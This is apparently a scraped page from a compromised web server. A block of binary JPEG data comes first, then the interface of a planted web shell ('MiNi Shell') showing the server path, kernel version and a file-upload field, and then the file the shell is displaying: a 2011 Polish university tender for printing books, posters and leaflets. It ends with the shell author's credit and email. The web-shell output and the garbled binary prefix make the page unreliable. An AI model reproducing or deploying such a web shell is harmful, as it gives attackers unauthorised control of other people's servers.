JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110216/23634-N-2011.html

<p class="kh_header"><b>Wałbrzych: Druk książek, plakatów, ulotek i innych materiałów</b><br>
<b>Numer ogłoszenia: 23634 - 2011; data zamieszczenia: 16.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Angelusa Silesiusa w Wałbrzychu , ul. Zamkowa 4, 58-300 Wałbrzych, woj. dolnośląskie, tel. 074 6419200, faks 074 6419202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk książek, plakatów, ulotek i innych materiałów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest druk i dostawa książek, plakatów i innych materiałów na rzecz zamawiającego zgodnie z podanym poniżej zestawieniem
1. 
Tytuł: Podatnik jako przedsiębiorca
Format: B5
Liczba stron: 224
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Posiada nr ISBN
2.
Tytuł: Edukacja i aktywizacja zawodowa osób z niepełnosprawnościami
Format: B5
Liczba stron: 150
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Posiada nr ISBN
3.
Tytuł: Z dziejów opozycji
Format: B5
Liczba egzemplarzy: 100
Liczba stron: 160 
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Posiada nr ISBN
4.
Tytuł: Gospodarcze, społeczne i kulturowe
Format: B5
Liczba stron: 160 
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Posiada nr ISBN
5.
Tytuł: Beyond 2000
Format: B5
Liczba stron: 192
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Posiada nr ISBN
6.
Tytuł: Pytanie o przyszłość rodziny
Format: B5
Liczba stron: 192
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Posiada nr ISBN
7.
Tytuł: Współczesne wyzwania logistyki, z. 2
Rodzaj publikacji: praca zbiorowa
Format: B5
Liczba stron: 192
Liczba egzemplarzy: 200
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Posiada nr ISBN
8.
Tytuł: Sztuka przypominania
Format: B5
Liczba stron: 240
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Posiada nr ISBN
9. 
Tytuł: Dydaktyka ogólna
Format: A4
Liczba stron: 144
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Posiada nr ISBN
10.
Tytuł: Pomoc humanitarna
Format: B5
Liczba stron: 112
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Posiada nr ISBN
11. 
Tytuł: Zarządzanie jakością w logistyce
Format: B5
Liczba stron: 240
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie
Korpus: klejony
Posiada nr ISBN
12.
Tytuł: Logistyka produkcji
Format: B5
Liczba stron: 112
Liczba egzemplarzy: 300
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Posiada nr ISBN
13.
Tytuł: Park im. Jana III Sobieskiego
Format: B5
Liczba stron: 140
Liczba egzemplarzy: 200
Kolor druku: 4+4
Wkładki: 8 wkładek 4+1, format podwójne B5, składane na pół
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie
Korpus: szyty
Posiada nr ISBN
14.
Tytuł: Historia Górnika Wałbrzych
Format: B5
Liczba stron: 256
Liczba egzemplarzy: 300
Kolor druku: 1+1
Wkładki kolorowe: 8 wkładek 4+4, papier kredowy 130 g
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie
Korpus: szyty
Posiada nr ISBN
15.
Tytuł: Sielesius Info
Rodzaj publikacji: kwartalnik (4 numery w ciągu roku)
Nakład: 200 egz. x 4
Format: A4
Liczba stron: 16
Kolor druku: 4+4
Papier: kreda 130 g
Okładka: lakierowana, błysk
Korpus: szyty metalowym spinaczem
Posiada nr ISSN, brak informacjo o nakładzie na okładce
16.
Teczki ofertówki, grzbiet 5 mm, na kartkę formatu A4
Liczba sztuk: 2 000 egz.
Wykrojnik: wzór drukarni
Karton 300 g, sztywny karton 300 g bielony dwustronnie
Kolor druku: 4+1
Wykończenie: lakier błysk
17.
Ulotka rekrutacyjna
Format: A4, łamanie na 3 do środka
Kolor druku: 4+4
Papier: kredowany 180 g, błysk
Liczba sztuk: 5 000 szt. (druk w 2 transzach po 2 500 egz.)
zastrzegamy sobie prawo do zmiany plików w każdej z transzy 
18.
Informator rekrutacyjny
Format: 21x15 cm
Liczba stron: 32
Korpus: szyty metalowym spinaczem
Kolor druku: 4 +4 kolory
Papier: kredowy 130 g
Okładka: kreda, 4 + 4, foliowanie
Liczba sztuk: 5 000 szt. (druk w dwóch transzach po 2 500 egz.)
zastrzegamy sobie prawo do zmiany plików w każdej z transzy 
19.
Plakat rekrutacyjny
Format: A2
Kolor druku: 4 + 0
Papier: kredowy błyszczący 170 g
Liczba sztuk: 200 szt.
20.
Plakat rekrutacyjny
Format: A3
Kolor druku: 4 + 0
Papier: kredowy błyszczący170 g
Liczba sztuk: 200 szt.
21.
Ulotka reklamowa
Format: A4, łamanie na 3 do środka
Kolor druku: 4+4
Papier: kredowy błyszczący 135 g
Maksymalna liczba sztuk: 1 000 szt. (druk w zależności od potrzeb, druk jednorazowy nie mniej niż 50)
22.
Plakat 
Format: A3
Kolor druku: 4 + 0
Papier: kredowany 170 g
Maksymalna liczba sztuk: 1 000 szt. (druk w zależności od potrzeb w ciągu całego roku, zastrzegamy sobie prawo do druku na życzenie pojedynczych egzemplarzy)
23.
Plakaty wielkoformatowe
Format: A1
Kolor druku: 4 + 0
Papier: kredowany 170 g
Liczba sztuk: 100 szt. (druk w zależności od potrzeb w ciągu całego roku, zastrzegamy sobie prawo do druku na życzenie pojedynczych egzemplarzy)
24.
Zaproszenia
Papier: kreda 300 g, bigowane
Kolor druku: 4+4
Format: podwójne DL (220 mm x 99 mm)
Maksymalna liczba sztuk: 500 szt. (w zależności od potrzeb, druk jednorazowy co najmniej 25 szt.)
25.
Teczka z grafikami (25 kart grafik w teczce) 
Papier: kreda 300 g
Kolor druku: 1+1
Okładka: teczka, kolory: 4 +0 , wykończenie folia błysk lub mat, sztywny karton 300 g bielony dwustronnie
Format: 25 kart formatu A4
Liczba kompletów: 200
26. 
Karty pocztowe 10 szt. + teczka
Papier: kreda 300 g, zaokrąglone rogi
Kolor druku: 4+4
Format: A6 (148x105)
Okładka: teczka ozdobna dostosowana do rozmiaru, kolory: 4 +0, wykończenie folia błysk lub mat, sztywny karton 300 g bielony dwustronnie
Liczba kompletów: 200
Zamawiający dostarczy prace w postaci plików .pdf lub .ps oraz projekty gotowych okładek w programach graficznych.
Zamawiający zastrzega sobie prawo wycofania z realizacji części pozycji nr 1-14 w przypadku nie-wywiązania się przez autora z narzuconych terminów bądź otrzymania negatywnej recenzji wydawniczej przez niezależnego recenzenta. Zastrzegamy sobie prawo do wydrukowania pozycji zamiennej, której parametry techniczne będą porównywalne z pozycją wycofaną. Zamawiający na 7 dni przed zleceniem druku pozycji książkowych poinformuje o tym wykonawcę. Zamawiający zastrzega sobie prawo zmian w granicach 10% 
w liczbie stron poszczególnych pozycji.
Podane w pozycjach 15-26 ilości druku poszczególnych pozycji są ilościami maksymalnymi, które mogą być zlecone do druku przez Zamawiającego. Zamawiający zastrzega sobie prawo do zlecenia druku minimum 50% każdej z tych pozycji oraz zastrzega sobie prawo do rezygnacji ze zlecenia druku  pozycji nr 22-25.
W przypadku ujawnienia przy odbiorze poszczególnych pozycji przedmiotu zamówienia wad lub błędów 
w druku za które winę ponosi Wykonawca,  zobowiązany jest on do ich bezpłatnego usunięcia w terminie 7 dni od stwierdzenia wady. Wszelkie koszty dostaw poszczególnych zamówień ponosi Wykonawca.
Zamawiający informuje, że przewiduje możliwość udzielenia zamówienia uzupełniającego w okresie 3 lat od udzielenia zamówienia podstawowego polegającego na dodruku wybranych pozycji książkowych zawartych w poz. 1-14 powyższego zestawienia. Zamówienie uzupełniające nie przekroczy 20% zamówienia podstawowego. W przypadku zlecenia wykonania zamówienia uzupełniającego wykonawca zobowiązany będzie do wykonania dodruku po cenach ofertowych. Ceny te mogą podlegać corocznie indeksacji przez zastosowanie wskaźnika wzrostu cen i usług konsumpcyjnych ogłaszanych przez GUS w Monitorze Polskim..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby niniejszego zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni udokumentować posiadanie wiedzy i doświadczenia przez wykazanie realizacji przynajmniej dwóch zamówień polegających na druku książek, plakatów itp.  o wartości nie mniejszej niż 30 000,00 zł brutto każde - zgodnie z załącznikiem nr 5 do SIWZ. Do wykazu należy załączyć dokumenty potwierdzające, że zamówienia te zostały wykonane lub są wykonywane należycie- np. referencje</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wyni?kają z przepisów prawa lub innych dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pwsz.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa im. Angelusa Silesiusa, 58-300 Wałbrzych ul. Zamkowa 4,  pok. nr 301.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2011 godzina 10:00, miejsce: Państwowa Wyższa Szkoła Zawodowa im. Angelusa Silesiusa, 58-300 Wałbrzych ul. Zamkowa 4,  pok. nr 301.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com